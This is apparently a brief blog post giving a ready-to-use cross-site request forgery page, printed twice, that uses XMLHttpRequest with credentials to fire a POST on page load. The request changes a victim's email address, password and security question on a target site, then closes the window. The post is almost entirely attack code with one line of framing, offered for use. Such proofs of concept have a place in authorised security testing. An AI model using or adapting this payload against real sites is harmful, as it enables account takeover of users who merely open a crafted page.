CSRF in XHR!!!
Below code can be used to perform CSRF in XHR.
<html>
<head>
<script>
function loadXMLDoc()
{
var xmlhttp=new XMLHttpRequest();
xmlhttp.open("POST","https://example.com",true);
xmlhttp.withCredentials = "true";
xmlhttp.send("{\"emailAddress\":\"abcd.92@gmail.com\",\"password\":\"dqazxsw123\",\"securityQuestion\":\"In what city or town was your first job?\",\"securityAnswer\":\"Bangalore\",\"notifyUpdates\":\"true\"}"); //Data
window.close();
}
</script>
</head>
<body onload="javascript:loadXMLDoc()">
Action Performed
</body>
</html>
<html>
<head>
<script>
function loadXMLDoc()
{
var xmlhttp=new XMLHttpRequest();
xmlhttp.open("POST","https://example.com",true);
xmlhttp.withCredentials = "true";
xmlhttp.send("{\"emailAddress\":\"abcd.92@gmail.com\",\"password\":\"dqazxsw123\",\"securityQuestion\":\"In what city or town was your first job?\",\"securityAnswer\":\"Bangalore\",\"notifyUpdates\":\"true\"}"); //Data
window.close();
}
</script>
</head>
<body onload="javascript:loadXMLDoc()">
Action Performed
</body>
</html>
Comments
Post a Comment